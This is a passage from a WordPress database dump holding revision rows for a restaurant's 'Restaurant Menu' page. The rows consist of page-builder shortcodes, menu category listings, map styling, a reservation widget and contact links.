switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 0% 0 26%\" item_padding_769_1024=\"0 0 0 5%\" item_padding_681_768=\"0px 0% 0px 19%\" item_padding_680=\"0px 10% 0 10%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1256\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 0 0 43%\" item_padding_1367_1600=\"0px 0 0px 23%\" item_padding_1025_1366=\"0px 0 0 14%\" item_padding_769_1024=\"9% 0 0% 12%\" item_padding_681_768=\"104px 0 0 28%\" item_padding_680=\"100px 9% 0 9%\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"Appetizers\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][/vc_column_inner][/vc_row_inner][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" right_parallax_background_element=\"1262\" left_parallax_background_element=\"1260\" anchor=\"menu\"][vc_column_inner offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"41px 0 0 55%\" item_padding_1367_1600=\"0px 0 0 55%\" item_padding_1025_1366=\"0px 0 0 53%\" item_padding_769_1024=\"0 0 48px 36%\" item_padding_681_768=\"41px 0 0 21%\" item_padding_680=\"41px 10% 0 10%\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"maindish\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"40px 0% 0 46%\" item_padding_1367_1600=\"130px 0% 0 46%\" item_padding_1025_1366=\"154px 0% 0 46%\" item_padding_769_1024=\"0 21% 0 51%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1507\" custom_zindex=\"10\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"160px\"][vc_row_inner enable_parallax_background_elements=\"yes\" right_parallax_background_element=\"2200\" left_parallax_background_element=\"1263\" anchor=\"visitus\"][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"45% 0% 0 18%\" item_padding_769_1024=\"0% 0 7% 14%\" item_padding_681_768=\"0% 0% 0 18%\" item_padding_680=\"0% 13% 0 13%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1264\" custom_zindex=\"10\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"21px 0 139px 28%\" item_padding_1367_1600=\"67px 0 139px 20%\" item_padding_1025_1366=\"21px 0 139px 11%\" item_padding_769_1024=\"21px 0 139px 20%\" item_padding_681_768=\"106px 0 139px 23%\" item_padding_680=\"87px 10% 100px 10%\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"Desserts\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1535374727085{padding-top: 76px !important;padding-bottom: 25px !important;}\" simple_background_color=\"#eff5f8\"][vc_column][vc_row_inner row_content_width=\"grid\"][vc_column_inner][mkdf_reservation_form open_table_skin=\"light\" open_table_id=\"161697\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1534409161900{padding-top: 8px !important;padding-bottom: 8px !important;}\"][vc_column][/vc_column][/vc_row][vc_row disable_background_image=\"\" css=\".vc_custom_1535968762401{padding-top: 130px !important;padding-bottom: 130px !important;}\" simple_background_image=\"2613\" background_image_position=\"top center\"][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0 34% 42px 34%\" item_padding_1367_1600=\"36px 30% 42px 30%\" item_padding_769_1024=\"36px 25% 42px 25%\" item_padding_680=\"0 4% 55px 4%\" item_padding_1025_1366=\"0 31% 42px 31%\" item_padding_681_768=\"0 17% 42px 17%\"][mkdf_section_title type=\"standard\" position=\"center\" title_tag=\"h2\" disable_break_words=\"no\" title=\"visit us\" line_length=\"0px\"]</p>\n<p style=\"text-align: center;\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque scelerisque libero sit amet dapibus ornare. Quisque quam erat,</p>\n<p>[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0px 42% 0% 42%\" item_padding_1367_1600=\"0px 40% 0% 40%\" item_padding_1025_1366=\"0px 39% 0% 39%\" item_padding_769_1024=\"0px 35% 0% 35%\" item_padding_681_768=\"0px 31% 0% 31%\" item_padding_680=\"0px 11% 0% 11%\"][mkdf_google_map snazzy_map_style=\"yes\" address1=\"618 St Johns Pl, Brooklyn, NY 11238, USA\" pin=\"1388\" map_height=\"300px\" snazzy_map_code=\"`{`<br />\n{<br />\n``elementType``: ``geometry``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#f5f5f5``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``elementType``: ``labels.icon``,<br />\n``stylers``: `{`<br />\n{<br />\n``visibility``: ``off``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``elementType``: ``labels.text.fill``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#616161``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``elementType``: ``labels.text.stroke``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#f5f5f5``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``administrative.land_parcel``,<br />\n``elementType``: ``labels.text.fill``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#bdbdbd``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``poi``,<br />\n``elementType``: ``geometry``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#eeeeee``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``poi``,<br />\n``elementType``: ``labels.text.fill``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#757575``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``poi.park``,<br />\n``elementType``: ``geometry``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#e5e5e5``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``poi.park``,<br />\n``elementType``: ``labels.text.fill``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#9e9e9e``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``road``,<br />\n``elementType``: ``geometry``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#ffffff``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``road.arterial``,<br />\n``elementType``: ``labels.text.fill``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#757575``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``road.highway``,<br />\n``elementType``: ``geometry``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#dadada``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``road.highway``,<br />\n``elementType``: ``labels.text.fill``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#616161``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``road.local``,<br />\n``elementType``: ``labels.text.fill``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#9e9e9e``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``transit.line``,<br />\n``elementType``: ``geometry``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#e5e5e5``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``transit.station``,<br />\n``elementType``: ``geometry``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#eeeeee``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``water``,<br />\n``elementType``: ``geometry``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#c9c9c9``<br />\n}<br />\n`}`<br />\n},<br />\n{<br />\n``featureType``: ``water``,<br />\n``elementType``: ``labels.text.fill``,<br />\n``stylers``: `{`<br />\n{<br />\n``color``: ``#9e9e9e``<br />\n}<br />\n`}`<br />\n}<br />\n`}`\" zoom=\"18\"][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"42px 0 0 0\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><a href=\"mailto:work@attika.ny\">work@attika.ny</a><br />\n<a href=\"mailto:events@attika.ny\">events@attika.ny</a><br />\n<a href=\"mailto:info@attika.ny\">info@attika.ny</a></p>\n<p>[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"64px 5% 83px 5%\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\">Sol y mar Riccione</h6>\n<p>[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row]</p>\n','Restaurant Menu','','inherit','closed','closed','','3068-autosave-v1','','','2020-12-05 17:58:55','2020-12-05 16:58:55','',3068,'https://www.ristorantesolymar.it/2020/12/05/3068-autosave-v1/',0,'revision','',0),(3372,1,'2020-12-05 17:59:07','2020-12-05 16:59:07','[vc_row css=\".vc_custom_1534251303879{background-color: #eff5f8 !important;}\"][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 5% 0 5%\"][rev_slider_vc alias=\"home\" enable_paspartu=\"no\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row][vc_column css=\".vc_custom_1534848855900{padding-top: 0px !important;}\"][mkdf_anchor_menu menu_items=\"%5B%7B%22label%22%3A%22resto%22%2C%22anchor%22%3A%22http%3A%2F%2Fattika.mikado-themes.com%23resto%22%7D%2C%7B%22label%22%3A%22cocktails%22%2C%22anchor%22%3A%22http%3A%2F%2Fattika.mikado-themes.com%23cocktails%22%7D%2C%7B%22label%22%3A%22drinks%22%2C%22anchor%22%3A%22http%3A%2F%2Fattika.mikado-themes.com%23drinks%22%7D%2C%7B%22label%22%3A%22visit%20us%22%2C%22anchor%22%3A%22http%3A%2F%2Fattika.mikado-themes.com%23visitus%22%7D%2C%7B%22label%22%3A%22landing%22%2C%22anchor%22%3A%22http%3A%2F%2Fattika.mikado-themes.com%2Flanding%22%7D%5D\"][/vc_column][/vc_row][vc_row disable_background_image=\"1024\" simple_background_image=\"1751\" background_image_position=\"top center\" css=\".vc_custom_1534849547927{margin-top: -1px !important;}\"][vc_column][vc_empty_space height=\"74px\"][vc_row_inner enable_parallax_background_elements=\"yes\" left_parallax_background_element=\"1251\" right_parallax_background_element=\"1252\" anchor=\"resto\"][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"90px 0 450px 24%\" item_padding_1367_1600=\"90px 0 450px 3%\" item_padding_1025_1366=\"110px 0 450px 0%\" item_padding_769_1024=\"3% 0 441px 17%\" item_padding_681_768=\"60px 0 450px 24%\" item_padding_680=\"36px 10% 450px 10%\"][attika_restaurant_menu_list show_featured_image=\"no\" alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"Cocktails\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1534859739459{padding-top: 100px !important;}\"][vc_column_inner css=\".vc_custom_1534927596297{margin-top: -500px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"78px 0% 0 60%\" item_padding_1367_1600=\"122px 0% 0 56%\" item_padding_1025_1366=\"212px 0% 0 44%\" item_padding_769_1024=\"50px 4% 0 22%\" item_padding_681_768=\"40px 0% 53% 24%\" item_padding_680=\"40px 7% 95% 7%\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"Afterdinner Cocktails\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner css=\".vc_custom_1534927611021{margin-top: -313px !important;}\" offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0% 0 23%\" item_padding_769_1024=\"32% 0 0 28%\" item_padding_680=\"0 12% 0 12%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1828\" custom_zindex=\"10\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][vc_row_inner enable_parallax_background_elements=\"yes\" right_parallax_background_element=\"1255\" anchor=\"cocktails\"][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"68% 0% 0 20%\" item_padding_769_1024=\"15% 0 0 19%\" item_padding_680=\"0% 10% 0 10%\" item_padding_681_768=\"17% 0% 0 23%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1254\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"120px 0% 0 35%\" item_padding_1025_1366=\"126px 0% 0 24%\" item_padding_769_1024=\"120px 0 0 25%\" item_padding_681_768=\"105px 0% 0 24%\" item_padding_680=\"120px 4% 0 10%\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"wine\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][vc_row_inner anchor=\"drinks\"][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0 0 0px 0\" item_padding_1025_1366=\"110px 0% 0px 0%\" item_padding_769_1024=\"100px 0 0 23%\" item_padding_681_768=\"94px 0% 0px 20%\" item_padding_680=\"53px 2% 0px 10%\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"beer\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"200px\"][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" right_parallax_background_element=\"1259\" left_parallax_background_element=\"1488\" css=\".vc_custom_1536850149982{padding-top: 0% !important;padding-bottom: 10% !important;}\"][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 0% 0 26%\" item_padding_769_1024=\"0 0 0 5%\" item_padding_681_768=\"0px 0% 0px 19%\" item_padding_680=\"0px 10% 0 10%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1256\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"0px 0 0 43%\" item_padding_1367_1600=\"0px 0 0px 23%\" item_padding_1025_1366=\"0px 0 0 14%\" item_padding_769_1024=\"9% 0 0% 12%\" item_padding_681_768=\"104px 0 0 28%\" item_padding_680=\"100px 9% 0 9%\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"Appetizers\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][/vc_column_inner][/vc_row_inner][vc_row_inner enable_parallax_background_elements=\"yes\" parallax_background_elements_vertical_alignment=\"bottom\" right_parallax_background_element=\"1262\" left_parallax_background_element=\"1260\" anchor=\"menu\"][vc_column_inner offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"41px 0 0 55%\" item_padding_1367_1600=\"0px 0 0 55%\" item_padding_1025_1366=\"0px 0 0 53%\" item_padding_769_1024=\"0 0 48px 36%\" item_padding_681_768=\"41px 0 0 21%\" item_padding_680=\"41px 10% 0 10%\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"maindish\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-6 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"right\" item_padding=\"40px 0% 0 46%\" item_padding_1367_1600=\"130px 0% 0 46%\" item_padding_1025_1366=\"154px 0% 0 46%\" item_padding_769_1024=\"0 21% 0 51%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1507\" custom_zindex=\"10\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][/vc_row_inner][vc_empty_space height=\"160px\"][vc_row_inner enable_parallax_background_elements=\"yes\" right_parallax_background_element=\"2200\" left_parallax_background_element=\"1263\" anchor=\"visitus\"][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"45% 0% 0 18%\" item_padding_769_1024=\"0% 0 7% 14%\" item_padding_681_768=\"0% 0% 0 18%\" item_padding_680=\"0% 13% 0 13%\"][mkdf_single_image enable_image_shadow=\"no\" center_image=\"no\" image=\"1264\" custom_zindex=\"10\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item item_padding=\"21px 0 139px 28%\" item_padding_1367_1600=\"67px 0 139px 20%\" item_padding_1025_1366=\"21px 0 139px 11%\" item_padding_769_1024=\"21px 0 139px 20%\" item_padding_681_768=\"106px 0 139px 23%\" item_padding_680=\"87px 10% 100px 10%\"][attika_restaurant_menu_list alignment_type=\"center-left\" orderby=\"menu_order\" order=\"ASC\" number=\"-1\" restaurant_menu_category=\"Desserts\"][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column_inner][vc_column_inner offset=\"vc_col-lg-4 vc_col-md-12 vc_col-xs-12\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1535374727085{padding-top: 76px !important;padding-bottom: 25px !important;}\" simple_background_color=\"#eff5f8\"][vc_column][vc_row_inner row_content_width=\"grid\"][vc_column_inner][mkdf_reservation_form open_table_skin=\"light\" open_table_id=\"161697\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1534409161900{padding-top: 8px !important;padding-bottom: 8px !important;}\"][vc_column][/vc_column][/vc_row][vc_row disable_background_image=\"\" css=\".vc_custom_1535968762401{padding-top: 130px !important;padding-bottom: 130px !important;}\" simple_background_image=\"2613\" background_image_position=\"top center\"][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0 34% 42px 34%\" item_padding_1367_1600=\"36px 30% 42px 30%\" item_padding_769_1024=\"36px 25% 42px 25%\" item_padding_680=\"0 4% 55px 4%\" item_padding_1025_1366=\"0 31% 42px 31%\" item_padding_681_768=\"0 17% 42px 17%\"][mkdf_section_title type=\"standard\" position=\"center\" title_tag=\"h2\" disable_break_words=\"no\" title=\"visit us\" line_length=\"0px\"]\r\n<p style=\"text-align: center;\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque scelerisque libero sit amet dapibus ornare. Quisque quam erat,</p>\r\n[/mkdf_section_title][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"0px 42% 0% 42%\" item_padding_1367_1600=\"0px 40% 0% 40%\" item_padding_1025_1366=\"0px 39% 0% 39%\" item_padding_769_1024=\"0px 35% 0% 35%\" item_padding_681_768=\"0px 31% 0% 31%\" item_padding_680=\"0px 11% 0% 11%\"][mkdf_google_map snazzy_map_style=\"yes\" address1=\"618 St Johns Pl, Brooklyn, NY 11238, USA\" pin=\"1388\" map_height=\"300px\" snazzy_map_code=\"`{`\r\n{\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.icon``,\r\n``stylers``: `{`\r\n{\r\n``visibility``: ``off``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``elementType``: ``labels.text.stroke``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#f5f5f5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``administrative.land_parcel``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#bdbdbd``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``poi.park``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#ffffff``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.arterial``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#757575``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#dadada``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.highway``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#616161``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``road.local``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.line``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#e5e5e5``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``transit.station``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#eeeeee``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``geometry``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#c9c9c9``\r\n}\r\n`}`\r\n},\r\n{\r\n``featureType``: ``water``,\r\n``elementType``: ``labels.text.fill``,\r\n``stylers``: `{`\r\n{\r\n``color``: ``#9e9e9e``\r\n}\r\n`}`\r\n}\r\n`}`\" zoom=\"18\"][/mkdf_elements_holder_item][/mkdf_elements_holder][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"42px 0 0 0\"][vc_column_text]\r\n<p style=\"text-align: center;\"><a href=\"mailto:work@attika.ny\">work@attika.ny</a>\r\n<a href=\"mailto:events@attika.ny\">events@attika.ny</a>\r\n<a href=\"mailto:info@attika.ny\">info@attika.ny</a></p>\r\n[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_elements_holder holder_full_height=\"no\" number_of_columns=\"one-column\" switch_to_one_column=\"\" alignment_one_column=\"\"][mkdf_elements_holder_item horizontal_alignment=\"center\" item_padding=\"64px 5% 83px 5%\"][vc_column_text]\r\n<h6 style=\"text-align: center;\">Sol y mar Riccione</h6>\r\n[/vc_column_text][/mkdf_elements_holder_item][/mkdf_elements_holder][/vc_column][/vc_row]','Restaurant Menu','','inherit','closed','closed','','3068-revision-v1','','','2020-12-05 17:59:07','2020-12-05 16:59:07','',3068,'https://www.ristorantesolymar.it/2020/12/05/3068-revision-v1/',0,'revision','',0),(3373,1,'2020-12-06 12:00:22','2020-12-06 11:00:22','','Creazioni','','publish','closed','closed','','creazioni','','','2020-12-06 12:16:45','2020-12-06 11:16:45','',0,'https://www.ristorantesolymar.it/?post_type=masonry-gallery&#038;p=3373',0,'masonry-gallery','',0),(3984,1,'2021-01-22 09:35:39','2021-01-22 08:35:39','','Coupon','','publish','closed','closed','','3984','','','2021-01-22 09:47:22','2021-01-22 